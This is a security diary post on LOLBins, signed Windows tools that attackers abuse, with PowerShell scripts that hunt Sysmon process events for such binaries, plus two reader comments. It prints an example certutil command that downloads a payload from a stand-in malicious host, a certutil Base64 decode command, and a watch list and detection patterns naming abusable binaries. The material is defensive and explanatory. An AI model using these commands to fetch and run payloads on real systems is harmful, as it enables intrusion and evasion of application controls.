Keep An Eye on LOLBins

Published: 2020-08-25. Last Updated: 2020-08-25 07:25:20 UTC
by Xavier Mertens (Version: 1)
Don't misread, I won't talk about "lolcats" today but about "LOLBins", or "Living Off The Land Binaries". All operating systems provide a rich toolbox to achieve day-to-day tasks like maintenance of certificates, installation of patches and applications, management of files, and many more. Those tools are installed by default and, most of the time, available to all users without specific access rights. Also very important: they are signed by the operating system vendor, so they are usually considered safe by default.

The problem is the following: these tools are very powerful and provide interesting features for attackers, so they are used for malicious purposes. Why reinvent the wheel if an attacker already has access to a tool that achieves a specific task? Let's have a look at some tools available in every Microsoft Windows operating system. If you're using AppLocker, there are chances that your policy allows Microsoft-signed binaries. Let's review some examples:

certutil.exe is a tool used to work with certificates (as the name says), but did you know it can also be used as a command-line browser to download content from a URL?

C:\Temp> certutil.exe -urlcache -split -f "https://badsite.com/payload.exe" iambad.exe

It can also be used to quickly decode a Base64-encoded payload:

C:\Temp> certutil -decode payload.txt payload.exe

I also mentioned several times in other diaries other tools like msbuild.exe, csc.exe, or jsc.exe that are provided by the .NET Framework[1]. They are useful to compile code on the fly or to spawn other processes.

Even simple commands like ping.exe can be used in alternative ways, for example to implement a pause in a script:

C:\Temp> ping -n 5 127.0.0.1

Ping will send 5 ICMP echo request packets to the loopback interface, one per second. So, we introduce a pause of 5 seconds.

There are plenty of tools that could be potentially dangerous if invoked from an abnormal parent process (like word.exe or powershell.exe) or by a regular user. A nice list has been compiled and made available online: the LOLBAS project[2] ("Living Off The Land Binaries and Scripts (and also Libraries)").

My advice is to track the usage of those tools via Sysmon and PowerShell. Here is an example of a quick script to extract interesting Sysmon process-creation events (credits to leoloobeek[3]):

# Image names to watch for (taken from the LOLBAS list)
$lolbins = @("Atbroker.exe","Bash.exe","Bitsadmin.exe","Certutil.exe","Cmdkey.exe","Cmstp.exe","Control.exe","Csc.exe","Dfsvc.exe","Diskshadow.exe","Dnscmd.exe","Esentutl.exe","Eventvwr.exe","Expand.exe","Extexport.exe","Extrac32.exe","Findstr.exe","Forfiles.exe","Ftp.exe","Gpscript.exe","Hh.exe","Ie4uinit.exe","Ieexec.exe","Infdefaultinstall.exe","Installutil.exe","Makecab.exe","Mavinject.exe","Microsoft.Workflow.Compiler.exe","Mmc.exe","Msbuild.exe","Msconfig.exe","Msdt.exe","Mshta.exe","Msiexec.exe","Odbcconf.exe","Pcalua.exe","Pcwrun.exe","Presentationhost.exe","Print.exe","Reg.exe","Regasm.exe","Regedit.exe","Register-cimprovider.exe","Regsvcs.exe","Regsvr32.exe","Replace.exe","Rpcping.exe","Rundll32.exe","Runonce.exe","Runscripthelper.exe","Sc.exe","Schtasks.exe","Scriptrunner.exe","SyncAppvPublishingServer.exe","Verclsid.exe","Wab.exe","Wmic.exe","Wscript.exe","Xwizard.exe","Appvlp.exe","Bginfo.exe","Cdb.exe","csi.exe","dnx.exe","Dxcap.exe","Mftrace.exe","Msdeploy.exe","msxsl.exe","rcsi.exe","Sqldumper.exe","Sqlps.exe","SQLToolsPS.exe","te.exe","Tracker.exe","vsjitdebugger.exe")

# Read the Sysmon process-creation events (Event ID 1) once instead of once per binary
$events = Get-WinEvent -FilterHashtable @{LogName="Microsoft-Windows-Sysmon/Operational"; Id=1}

Foreach($lolbin in $lolbins)
{
    # Escape the binary name so its "." is matched literally and require a path separator
    # before it. In the event message, "Image:" and "CommandLine:" are separated by other
    # fields (FileVersion, Description, ...), so (?:.*`r`n)*? skips the lines in between.
    $escaped = [regex]::Escape($lolbin)
    $regex = [regex]"(?i)`r`n(?<image>Image: .*\\$escaped)`r`n(?:.*`r`n)*?(?<args>CommandLine: .*)`r`n"

    $events | Where-Object { $regex.IsMatch($_.Message) } | ForEach-Object {
        $match = $regex.Match($_.Message)

        $Out = New-Object PSObject
        $Out | Add-Member NoteProperty 'Binary' $lolbin
        $Out | Add-Member NoteProperty 'Image' $match.Groups["image"].Value
        $Out | Add-Member NoteProperty 'Args' $match.Groups["args"].Value
        $Out | Format-List
    }
}
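As an added example (not from the diary or from leoloobeek's gist), the same hunt can read the Sysmon event fields directly from the event XML instead of matching the message text. This also surfaces the user and the parent process, so a LOLBin started from an unusual parent stands out, and it flags the certutil download/decode switches shown above. The parent list and the short LOLBin list are assumed for illustration.

```powershell
# Added example: LOLBin hunt over Sysmon Event ID 1 using the event XML fields.
# Short watch list for illustration; use the full LOLBAS list in practice.
$lolbins = @("certutil.exe","msbuild.exe","csc.exe","jsc.exe","mshta.exe",
             "regsvr32.exe","rundll32.exe","wmic.exe","bitsadmin.exe")
# Parents that should rarely launch these tools (assumed set, adapt to your environment)
$suspiciousParents = @("winword.exe","excel.exe","outlook.exe","powershell.exe")
# Command-line switches from the diary that deserve a closer look
$suspiciousArgs = @{ "certutil.exe" = "(?i)-urlcache|-decode" }

$events = Get-WinEvent -FilterHashtable @{LogName="Microsoft-Windows-Sysmon/Operational"; Id=1} `
                       -ErrorAction SilentlyContinue

$events | ForEach-Object {
    # Convert <Data Name="...">value</Data> elements into a name -> value table
    $xml = [xml]$_.ToXml()
    $d = @{}
    foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

    $image  = [IO.Path]::GetFileName($d['Image'])
    $parent = [IO.Path]::GetFileName($d['ParentImage'])
    if ($lolbins -contains $image) {          # -contains is case-insensitive
        $badParent = $suspiciousParents -contains $parent
        $badArgs   = $suspiciousArgs.ContainsKey($image.ToLower()) -and
                     ($d['CommandLine'] -match $suspiciousArgs[$image.ToLower()])
        [PSCustomObject]@{
            Time        = $_.TimeCreated
            Binary      = $image
            Parent      = $parent
            User        = $d['User']
            CommandLine = $d['CommandLine']
            Suspicious  = ($badParent -or $badArgs)
        }
    }
} | Sort-Object Suspicious -Descending | Format-Table -AutoSize -Wrap
```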

It's easy to find existing Sysmon configurations that already take LOLBins into account[4]. 

Stay safe and keep an eye on those tools!

[1] https://isc.sans.edu/forums/diary/Malware+Samples+Compiling+Their+Next+Stage+on+Premise/25278
[2] https://lolbas-project.github.io
[3] https://gist.github.com/leoloobeek/a3a4d9af3bf7fb37b6d82a7a17e7176d
[4] https://raw.githubusercontent.com/ion-storm/sysmon-config/master/sysmonconfig-export.xml

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant

Comments

I have noticed that these are getting more and more popular with CTF creators as I see them more often on hackthebox. Good post!

Hi,

Lovely article on this topic! I immediately tried this myself, but upon execution of the script I noticed the arguments and Image are not being displayed. Is this a known error or am I doing something wrong? Also, I would like to extend the functionality to include the user who started the process.
I'd love to hear back from you!

Thanks in Advance!
Pieter
Security Engineer for Lineas